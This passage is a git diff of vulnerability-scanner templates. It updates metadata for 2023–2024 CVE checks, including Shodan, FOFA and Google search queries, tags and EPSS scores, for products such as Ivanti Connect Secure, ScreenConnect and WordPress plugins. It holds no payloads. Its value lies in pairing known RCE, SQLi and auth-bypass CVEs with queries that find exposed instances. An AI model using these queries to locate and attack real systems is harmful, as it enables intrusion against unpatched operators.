method: GET diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index 0fd863efdd..ecb1af872c 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: h2o product: h2o - shodan-query: title:"H2O Flow" + shodan-query: + - title:"H2O Flow" + - http.title:"h2o flow" fofa-query: title="h2o flow" google-query: intitle:"h2o flow" tags: cve,cve2023,h2o-3,h2o,ml diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index a8d8042f29..801d41fbe0 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -22,15 +22,14 @@ info: epss-percentile: 0.90865 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 + max-request: 2 vendor: wpfastestcache - product: wp_fastest_cache + product: "wp_fastest_cache" framework: wordpress - shodan-query: http.html:/wp-content/plugins/wp-fastest-cache/ - fofa-query: body=/wp-content/plugins/wp-fastest-cache/ - publicwww-query: /wp-content/plugins/wp-fastest-cache/ - tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin - + shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" + fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" + publicwww-query: "/wp-content/plugins/wp-fastest-cache/" + tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache flow: | if (http(1)) { for (let i = 0; i < 2; i++) { diff --git a/http/cves/2023/CVE-2023-6065.yaml b/http/cves/2023/CVE-2023-6065.yaml index 554727c555..c585cad89b 100644 --- a/http/cves/2023/CVE-2023-6065.yaml +++ b/http/cves/2023/CVE-2023-6065.yaml @@ -24,7 +24,7 @@ info: vendor: quttera product: quttera_web_malware_scanner framework: wordpress - tags: cve,cve2023,wp-plugin,quttera,wpscan, + tags: cve,cve2023,wp-plugin,quttera,wpscan,wordpress http: - method: GET diff --git a/http/cves/2023/CVE-2023-6114.yaml b/http/cves/2023/CVE-2023-6114.yaml index f0103e009d..ca409bb30f 100644 --- a/http/cves/2023/CVE-2023-6114.yaml +++ b/http/cves/2023/CVE-2023-6114.yaml @@ -26,7 +26,7 @@ info: product: duplicator framework: wordpress google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp + tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp,awesomemotive http: - method: GET diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index c823d8f680..ac56d2252c 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -30,7 +30,7 @@ info: product: my_calendar framework: wordpress fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"' - tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar + tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index 7660993cd5..dda60f5ff6 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -27,7 +27,11 @@ info: max-request: 11 vendor: alkacon product: opencms - shodan-query: title:"opencms" + shodan-query: + - title:"opencms" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" + - /opencms/ fofa-query: title="opencms" google-query: intitle:"opencms" tags: cve2023,cve,opencms,xss,alkacon diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index 3bd9c533af..3168955dcc 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -23,10 +23,13 @@ info: max-request: 1 vendor: alkacon product: opencms - shodan-query: "/opencms/" + shodan-query: + - "/opencms/" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" fofa-query: title="opencms" google-query: intitle:"opencms" - tags: cve,cve2023,redirect,opencms + tags: cve,cve2023,redirect,opencms,alkacon http: - method: GET diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index cec769be7b..cb6c3089dd 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -25,7 +25,7 @@ info: shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/ fofa-query: body=/wp-content/plugins/wordpress-toolbar/ publicwww-query: "/wp-content/plugins/wordpress-toolbar/" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh http: - method: GET diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 96dc4246a7..33ebd2b226 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -28,7 +28,7 @@ info: fofa-query: body=/wp-content/plugins/backup-backup/ publicwww-query: /wp-content/plugins/backup-backup/ google-query: inurl:"/wp-content/plugins/backup-backup/" - tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp + tags: packetstorm,cve,cve2023,wp-plugin,rce,unauth,wordpress,wp,backupbliss flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index df8efb7dc9..34c09512b2 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress http: - method: GET diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index 5617af765f..2e87ba92ce 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/essential-blocks/ fofa-query: body=/wp-content/plugins/essential-blocks/ publicwww-query: "/wp-content/plugins/essential-blocks/" - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper http: - method: GET diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index 39f79c8112..fb238e4d42 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive + tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive,thimpress variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index 34b6072580..05daacb7c8 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -26,7 +26,9 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index d12431188f..5af162471b 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/post-smtp fofa-query: body=/wp-content/plugins/post-smtp publicwww-query: "/wp-content/plugins/post-smtp" - tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass + tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts variables: fcm_token: "{{randstr_1}}" device: "{{randstr_2}}" diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index f54123a4f1..646cc1ac80 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -28,9 +28,11 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2023,mlflow,lfi,intrusive + tags: cve,cve2023,mlflow,lfi,intrusive,lfprojects http: - raw: diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 5d6745fa14..cdb0670438 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -27,7 +27,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index eae3fd1da0..53ce0b1af0 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/wp-simple-firewall fofa-query: body=/wp-content/plugins/wp-simple-firewall publicwww-query: "/wp-content/plugins/wp-simple-firewall" - tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security + tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security,getshieldsecurity http: - raw: diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 4482533320..57b2e30ef2 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -25,7 +25,10 @@ info: max-request: 6 vendor: gitlab product: gitlab - shodan-query: title:"Gitlab" + shodan-query: + - title:"Gitlab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 33b6f5b735..4629219165 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -22,11 +22,13 @@ info: cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: ssssssss - product: spider-flow - fofa-query: app="SpiderFlow" - tags: cve,cve2024,spiderflow,crawler,unauth,rce + product: "spider-flow" + fofa-query: + - "app=\"SpiderFlow\"" + - app="spiderflow" + tags: cve,cve2024,spiderflow,crawler,unauth,rce,ssssssss flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index b2fa1f6f6a..bd4b85c563 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -22,10 +22,13 @@ info: cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: verified: true + max-request: 7 vendor: github - product: enterprise_server - shodan-query: title:"GitHub Enterprise" - fofa-query: app="Github-Enterprise" + product: "enterprise_server" + shodan-query: + - "title:\"GitHub Enterprise\"" + - micro focus dsd + fofa-query: "app=\"Github-Enterprise\"" tags: cve,cve2024,rce,github,enterprise variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index 3df53ddbe7..f7d878effb 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -17,18 +17,26 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0204 cwe-id: CWE-425 - epss-score: 0.53864 - epss-percentile: 0.97564 + epss-score: 0.50096 + epss-percentile: 0.97519 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer - shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 - fofa-query: app="GoAnywhere-MFT" - zoomeye-query: app:"Fortra GoAnywhere-MFT" - tags: packetstorm,cve,cve2024,auth-bypass,goanywhere + shodan-query: + - http.favicon.hash:1484947000,1828756398,1170495932 + - http.favicon.hash:1484947000 + fofa-query: + - app="GoAnywhere-MFT" + - icon_hash=1484947000 + - icon_hash=1484947000,1828756398,1170495932 + - app="goanywhere-mft" + zoomeye-query: + - app:"Fortra GoAnywhere-MFT" + - app:"fortra goanywhere-mft" + tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra http: - method: GET diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 5babf693a2..98bef039f1 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -23,14 +23,23 @@ info: epss-percentile: 0.19233 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: myeventon product: eventon framework: wordpress - shodan-query: vuln:CVE-2023-2796 - fofa-query: wp-content/plugins/eventon/ - publicwww-query: "/wp-content/plugins/eventon/" - google-query: inurl:"/wp-content/plugins/eventon/" - tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan + shodan-query: + - "vuln:CVE-2023-2796" + - http.html:/wp-content/plugins/eventon-lite/ + - http.html:/wp-content/plugins/eventon/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon/" + - /wp-content/plugins/eventon-lite/ + google-query: "inurl:\"/wp-content/plugins/eventon/\"" + tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon http: - method: POST diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index 1a1258ea1b..239fd5cf77 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -26,11 +26,14 @@ info: max-request: 1 vendor: ncast_project product: ncast - fofa-query: app="Ncast-产品" && title=="高清智能录播系统" - zoomeye-query: title:"高清智能录播系统" shodan-query: http.title:"高清智能录播系统" + fofa-query: + - app="Ncast-产品" && title=="高清智能录播系统" + - title="高清智能录播系统" + - app="ncast-产品" && title=="高清智能录播系统" google-query: intitle:"高清智能录播系统" - tags: cve,cve2024,ncast,rce + zoomeye-query: title:"高清智能录播系统" + tags: cve,cve2024,ncast,rce,ncast_project http: - raw: diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 614e47bf2b..de4cc34394 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -23,8 +23,8 @@ info: max-request: 2 vendor: monitorr product: monitorr - fofa-query: "icon_hash=\"-211006074\"" shodan-query: http.favicon.hash:"-211006074" + fofa-query: "icon_hash=\"-211006074\"" tags: cve,cve2024,file-upload,intrusive,monitorr variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index fd8249780b..bf2d604f9e 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -21,17 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2024-1021 cwe-id: CWE-918 - epss-score: 0.01163 - epss-percentile: 0.84597 + epss-score: 0.00973 + epss-percentile: 0.83349 cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: ruifang-tech product: rebuild - fofa-query: "icon_hash=\"871154672\"" shodan-query: http.favicon.hash:"871154672" - tags: cve2024,cve,rebuild,ssrf + fofa-query: "icon_hash=\"871154672\"" + tags: cve2024,cve,rebuild,ssrf,ruifang-tech http: - method: GET diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 413103a138..aaf869114c 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -31,7 +31,7 @@ info: product: html5_video_player framework: wordpress fofa-query: "\"wordpress\" && body=\"html5-video-player\"" - tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins http: - method: GET diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 1b2a26a019..99573cf8f1 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -27,7 +27,7 @@ info: fofa-query: body="/wp-content/plugins/ultimate-member" publicwww-query: "/wp-content/plugins/ultimate-member/" zoomeye-query: app:"WordPress Ultimate Member Plugin" - tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin + tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin,sqli http: - raw: diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index 06f1156ff3..d6a169dc89 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.5 cve-id: CVE-2024-1183 cwe-id: CWE-601 - epss-score: 0.00061 - epss-percentile: 0.24702 + epss-score: 0.00076 + epss-percentile: 0.32361 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index ea22b280ea..c02512df21 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -26,10 +26,10 @@ info: vendor: learndash product: learndash framework: wordpress - publicwww-query: "/wp-content/plugins/sfwd-lms" - google-query: inurl:"/wp-content/plugins/sfwd-lms" shodan-query: http.html:/wp-content/plugins/sfwd-lms fofa-query: body=/wp-content/plugins/sfwd-lms + publicwww-query: "/wp-content/plugins/sfwd-lms" + google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index d0eb06f584..11a9799da0 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -26,10 +26,10 @@ info: vendor: learndash product: learndash framework: wordpress - publicwww-query: "/wp-content/plugins/sfwd-lms" - google-query: inurl:"/wp-content/plugins/sfwd-lms" shodan-query: http.html:/wp-content/plugins/sfwd-lms fofa-query: body=/wp-content/plugins/sfwd-lms + publicwww-query: "/wp-content/plugins/sfwd-lms" + google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index eeec45de5e..78d1d486cb 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2024-1212 cwe-id: CWE-78 - epss-score: 0.00721 - epss-percentile: 0.802 + epss-score: 0.00213 + epss-percentile: 0.59325 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index c74b6d0427..254e9129a9 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -26,9 +26,16 @@ info: vendor: connectwise product: screenconnect shodan-query: http.favicon.hash:-82958153 - fofa-query: app="ScreenConnect-Remote-Support-Software" - zoomeye-query: app:"ScreenConnect Remote Management Software" - hunter-query: app.name="ConnectWise ScreenConnect software" + fofa-query: + - app="ScreenConnect-Remote-Support-Software" + - app="screenconnect-remote-support-software" + - icon_hash=-82958153 + zoomeye-query: + - app:"ScreenConnect Remote Management Software" + - app:"screenconnect remote management software" + hunter-query: + - app.name="ConnectWise ScreenConnect software" + - app.name="connectwise screenconnect software" tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev variables: string: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 86bd3dc8a4..ea8a52ae6b 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -27,10 +27,21 @@ info: max-request: 1 vendor: pyload product: pyload - shodan-query: html:"pyload" - zoomeye-query: app:"pyLoad" - fofa-query: title="login - pyload" - google-query: intitle:"login - pyload" + shodan-query: + - html:"pyload" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" + zoomeye-query: + - app:"pyLoad" + - app:"pyload" tags: cve,cve2024,python,pip,pyload,access-control http: diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 0250d430b5..db0f57cbf4 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -17,17 +17,26 @@ info: cvss-score: 5.3 cve-id: CVE-2024-21645 cwe-id: CWE-74 - epss-score: 0.00046 - epss-percentile: 0.13723 + epss-score: 0.0112 + epss-percentile: 0.84559 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: pyload product: pyload - shodan-query: "title:\"pyload\"" - fofa-query: title="login - pyload" - google-query: intitle:"login - pyload" + shodan-query: + - "title:\"pyload\"" + - http.title:"login - pyload" + - http.html:"pyload" + - http.title:"pyload" + fofa-query: + - title="login - pyload" + - body="pyload" + - title="pyload" + google-query: + - intitle:"login - pyload" + - intitle:"pyload" zoomeye-query: app:"pyload" tags: cve,cve2024,pyload,authenticated,injection variables: diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 53c6de5d31..52b9c55411 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -21,7 +21,8 @@ info: epss-percentile: 0.0866 metadata: verified: true - fofa-query: app="ATLASSIAN-Confluence" + max-request: 3 + fofa-query: "app=\"ATLASSIAN-Confluence\"" tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 5efad6cb3e..a99d6d3e8e 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -23,8 +23,13 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: packetstorm,cve,cve2024,kev,rce,ivanti diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index f111b9e3e3..2e2ce56459 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -24,8 +24,13 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: cve,cve2024,kev,ssrf,ivanti diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index c64bac7317..001df73625 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -17,8 +17,13 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: cve,cve2024,xxe,ivanti variables: diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index 71a859f4ae..04aba3e984 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -19,8 +19,13 @@ info: max-request: 1 vendor: ibm product: operational_decision_manager - shodan-query: html:"IBM ODM" - fofa-query: title="IBM ODM" + shodan-query: + - html:"IBM ODM" + - http.html:"ibm odm" + fofa-query: + - title="IBM ODM" + - title="ibm odm" + - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce http: diff --git a/http/cves/2024/CVE-2024-22320.yaml b/http/cves/2024/CVE-2024-22320.yaml index 9bfaf8ff89..4240eeec50 100644 --- a/http/cves/2024/CVE-2024-22320.yaml +++ b/http/cves/2024/CVE-2024-22320.yaml @@ -22,8 +22,13 @@ info: max-request: 1 vendor: ibm product: operational_decision_manager - shodan-query: html:"IBM ODM" - fofa-query: title="IBM ODM" + shodan-query: + - html:"IBM ODM" + - http.html:"ibm odm" + fofa-query: + - title="IBM ODM" + - title="ibm odm" + - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce http: diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index 650fcab2c0..ba9abebe76 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -22,9 +22,10 @@ info: epss-percentile: 0.95082 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: eyoucms product: eyoucms - fofa-query: title="eyoucms" + fofa-query: "title=\"eyoucms\"" tags: cve2024,cve,eyoucms,cms,xss http: diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 4b5538ffe9..66902335a2 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -14,18 +14,20 @@ info: cvss-score: 9.8 cve-id: CVE-2024-23917 cwe-id: CWE-306,CWE-288 - epss-score: 0.00091 - epss-percentile: 0.38219 + epss-score: 0.04384 + epss-percentile: 0.92363 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: jetbrains product: teamcity - shodan-query: http.title:teamcity - fofa-query: title=teamcity - google-query: intitle:teamcity - tags: cve,cve2024,auth-bypass,teamcity + shodan-query: + - "http.title:teamcity" + - http.component:"teamcity" + fofa-query: "title=teamcity" + google-query: "intitle:teamcity" + tags: cve,cve2024,auth-bypass,teamcity,jetbrains flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 85820d38e9..8498796778 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -22,7 +22,9 @@ info: max-request: 1 vendor: superwebmailer product: superwebmailer - shodan-query: title:"SuperWebMailer" + shodan-query: + - title:"SuperWebMailer" + - http.title:"superwebmailer" fofa-query: title="superwebmailer" google-query: intitle:"superwebmailer" tags: cve,cve2024,superwebmailer,xss diff --git a/http/cves/2024/CVE-2024-25669.yaml b/http/cves/2024/CVE-2024-25669.yaml index 84ee144ab5..63ed8e2075 100644 --- a/http/cves/2024/CVE-2024-25669.yaml +++ b/http/cves/2024/CVE-2024-25669.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: a360inc product: caseaware - fofa-query: title="CaseAware" + fofa-query: + - title="CaseAware" + - title="caseaware" tags: cve,cve2024,xss,caseaware,a360inc http: diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index 4a66b1aedd..c8d2d8a071 100644 --- 